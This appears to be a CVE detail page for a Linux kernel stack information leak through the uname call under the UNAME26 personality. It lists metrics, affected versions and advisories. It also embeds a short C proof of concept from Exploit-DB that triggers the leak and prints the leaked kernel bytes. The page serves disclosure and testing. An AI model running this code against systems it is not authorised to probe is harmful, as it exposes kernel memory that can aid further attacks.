CVE-2012-0957 : Detail

CVE-2012-0957

A05-Security Misconfiguration
0.04%V3
Local
2012-12-21
10h00 +00:00
2013-01-04
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The override_release function in kernel/sys.c in the Linux kernel before 3.4.16 allows local users to obtain sensitive information from kernel stack memory via a uname system call in conjunction with a UNAME26 personality.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-16 Category : Configuration
Weaknesses in this category are typically introduced during the configuration of the software.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:C/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37937

Publication date : 2012-10-08 22h00 +00:00
Author : Brad Spengler
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/55855/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. */ /* Test for UNAME26 personality uname kernel stack leak. * Copyright 2012, Kees Cook <[email protected]> * License: GPLv3 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <sys/personality.h> #include <sys/utsname.h> #define UNAME26 0x0020000 int dump_uts(void) { int i, leaked = 0; struct utsname buf = { }; if (uname(&buf)) { perror("uname"); exit(1); } printf("%s\n", buf.release); for (i = strlen(buf.release) + 1; i < sizeof(buf.release); i++) { unsigned char c = (unsigned char)buf.release[i]; printf("%02x", c); if (c) leaked = 1; } printf("\n"); return leaked ? (i - (strlen(buf.release) + 1)) : 0; } int main(int ac, char **av) { int leaked; leaked = dump_uts(); if (leaked) { printf("Leaked %d bytes even without UNAME26!?\n", leaked); return 1; } if (personality(PER_LINUX | UNAME26) < 0) { perror("personality"); exit(1); } leaked = dump_uts(); if (leaked) { printf("Leaked %d bytes!\n", leaked); return 1; } else { printf("Seems safe.\n"); return 0; } }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 3.4.15

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0

Linux>>Linux_kernel >> Version 3.0.1

Linux>>Linux_kernel >> Version 3.0.2

Linux>>Linux_kernel >> Version 3.0.3

Linux>>Linux_kernel >> Version 3.0.4

Linux>>Linux_kernel >> Version 3.0.5

Linux>>Linux_kernel >> Version 3.0.6

Linux>>Linux_kernel >> Version 3.0.7

Linux>>Linux_kernel >> Version 3.0.8

Linux>>Linux_kernel >> Version 3.0.9

Linux>>Linux_kernel >> Version 3.0.10

Linux>>Linux_kernel >> Version 3.0.11

Linux>>Linux_kernel >> Version 3.0.12

Linux>>Linux_kernel >> Version 3.0.13

Linux>>Linux_kernel >> Version 3.0.14

Linux>>Linux_kernel >> Version 3.0.15

Linux>>Linux_kernel >> Version 3.0.16

Linux>>Linux_kernel >> Version 3.0.17

Linux>>Linux_kernel >> Version 3.0.18

Linux>>Linux_kernel >> Version 3.0.19

Linux>>Linux_kernel >> Version 3.0.20

Linux>>Linux_kernel >> Version 3.0.21

Linux>>Linux_kernel >> Version 3.0.22

Linux>>Linux_kernel >> Version 3.0.23

Linux>>Linux_kernel >> Version 3.0.24

Linux>>Linux_kernel >> Version 3.0.25

Linux>>Linux_kernel >> Version 3.0.26

Linux>>Linux_kernel >> Version 3.0.27

Linux>>Linux_kernel >> Version 3.0.28

Linux>>Linux_kernel >> Version 3.0.29

Linux>>Linux_kernel >> Version 3.0.30

Linux>>Linux_kernel >> Version 3.0.31

Linux>>Linux_kernel >> Version 3.0.32

Linux>>Linux_kernel >> Version 3.0.33

Linux>>Linux_kernel >> Version 3.0.34

Linux>>Linux_kernel >> Version 3.0.35

Linux>>Linux_kernel >> Version 3.0.36

Linux>>Linux_kernel >> Version 3.0.37

Linux>>Linux_kernel >> Version 3.0.38

Linux>>Linux_kernel >> Version 3.0.39

Linux>>Linux_kernel >> Version 3.0.40

Linux>>Linux_kernel >> Version 3.0.41

Linux>>Linux_kernel >> Version 3.0.42

Linux>>Linux_kernel >> Version 3.0.43

Linux>>Linux_kernel >> Version 3.0.44

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1

Linux>>Linux_kernel >> Version 3.1.1

Linux>>Linux_kernel >> Version 3.1.2

Linux>>Linux_kernel >> Version 3.1.3

Linux>>Linux_kernel >> Version 3.1.4

Linux>>Linux_kernel >> Version 3.1.5

Linux>>Linux_kernel >> Version 3.1.6

Linux>>Linux_kernel >> Version 3.1.7

Linux>>Linux_kernel >> Version 3.1.8

Linux>>Linux_kernel >> Version 3.1.9

Linux>>Linux_kernel >> Version 3.1.10

Linux>>Linux_kernel >> Version 3.2

Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2

    Linux>>Linux_kernel >> Version 3.2.1

    Linux>>Linux_kernel >> Version 3.2.1

      Linux>>Linux_kernel >> Version 3.2.2

      Linux>>Linux_kernel >> Version 3.2.3

      Linux>>Linux_kernel >> Version 3.2.4

      Linux>>Linux_kernel >> Version 3.2.5

      Linux>>Linux_kernel >> Version 3.2.6

      Linux>>Linux_kernel >> Version 3.2.7

      Linux>>Linux_kernel >> Version 3.2.8

      Linux>>Linux_kernel >> Version 3.2.9

      Linux>>Linux_kernel >> Version 3.2.10

      Linux>>Linux_kernel >> Version 3.2.11

      Linux>>Linux_kernel >> Version 3.2.12

      Linux>>Linux_kernel >> Version 3.2.13

      Linux>>Linux_kernel >> Version 3.2.14

      Linux>>Linux_kernel >> Version 3.2.15

      Linux>>Linux_kernel >> Version 3.2.16

      Linux>>Linux_kernel >> Version 3.2.17

      Linux>>Linux_kernel >> Version 3.2.18

      Linux>>Linux_kernel >> Version 3.2.19

      Linux>>Linux_kernel >> Version 3.2.20

      Linux>>Linux_kernel >> Version 3.2.21

      Linux>>Linux_kernel >> Version 3.2.22

      Linux>>Linux_kernel >> Version 3.2.23

      Linux>>Linux_kernel >> Version 3.2.24

      Linux>>Linux_kernel >> Version 3.2.25

      Linux>>Linux_kernel >> Version 3.2.26

      Linux>>Linux_kernel >> Version 3.2.27

      Linux>>Linux_kernel >> Version 3.2.28

      Linux>>Linux_kernel >> Version 3.2.29

      Linux>>Linux_kernel >> Version 3.2.30

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3

      Linux>>Linux_kernel >> Version 3.3.1

      Linux>>Linux_kernel >> Version 3.3.2

      Linux>>Linux_kernel >> Version 3.3.3

      Linux>>Linux_kernel >> Version 3.3.4

      Linux>>Linux_kernel >> Version 3.3.5

      Linux>>Linux_kernel >> Version 3.3.6

      Linux>>Linux_kernel >> Version 3.3.7

      Linux>>Linux_kernel >> Version 3.3.8

      Linux>>Linux_kernel >> Version 3.4

      Linux>>Linux_kernel >> Version 3.4

        Linux>>Linux_kernel >> Version 3.4

        Linux>>Linux_kernel >> Version 3.4

          Linux>>Linux_kernel >> Version 3.4

          Linux>>Linux_kernel >> Version 3.4

            Linux>>Linux_kernel >> Version 3.4

            Linux>>Linux_kernel >> Version 3.4

              Linux>>Linux_kernel >> Version 3.4

              Linux>>Linux_kernel >> Version 3.4

                Linux>>Linux_kernel >> Version 3.4

                Linux>>Linux_kernel >> Version 3.4

                  Linux>>Linux_kernel >> Version 3.4

                  Linux>>Linux_kernel >> Version 3.4

                    Linux>>Linux_kernel >> Version 3.4

                    Linux>>Linux_kernel >> Version 3.4

                      Linux>>Linux_kernel >> Version 3.4.1

                      Linux>>Linux_kernel >> Version 3.4.1

                        Linux>>Linux_kernel >> Version 3.4.2

                        Linux>>Linux_kernel >> Version 3.4.2

                          Linux>>Linux_kernel >> Version 3.4.3

                          Linux>>Linux_kernel >> Version 3.4.3

                            Linux>>Linux_kernel >> Version 3.4.4

                            Linux>>Linux_kernel >> Version 3.4.4

                              Linux>>Linux_kernel >> Version 3.4.5

                              Linux>>Linux_kernel >> Version 3.4.5

                                Linux>>Linux_kernel >> Version 3.4.10

                                Linux>>Linux_kernel >> Version 3.4.11

                                Linux>>Linux_kernel >> Version 3.4.12

                                Linux>>Linux_kernel >> Version 3.4.13

                                Linux>>Linux_kernel >> Version 3.4.14

                                References

                                http://www.ubuntu.com/usn/USN-1644-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://www.ubuntu.com/usn/USN-1645-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://www.ubuntu.com/usn/USN-1647-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://www.ubuntu.com/usn/USN-1652-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://www.ubuntu.com/usn/USN-1646-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://www.ubuntu.com/usn/USN-1648-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://www.ubuntu.com/usn/USN-1649-1
                                Tags : vendor-advisory, x_refsource_UBUNTU
                                http://secunia.com/advisories/51409
                                Tags : third-party-advisory, x_refsource_SECUNIA
                                http://www.openwall.com/lists/oss-security/2012/10/09/4
                                Tags : mailing-list, x_refsource_MLIST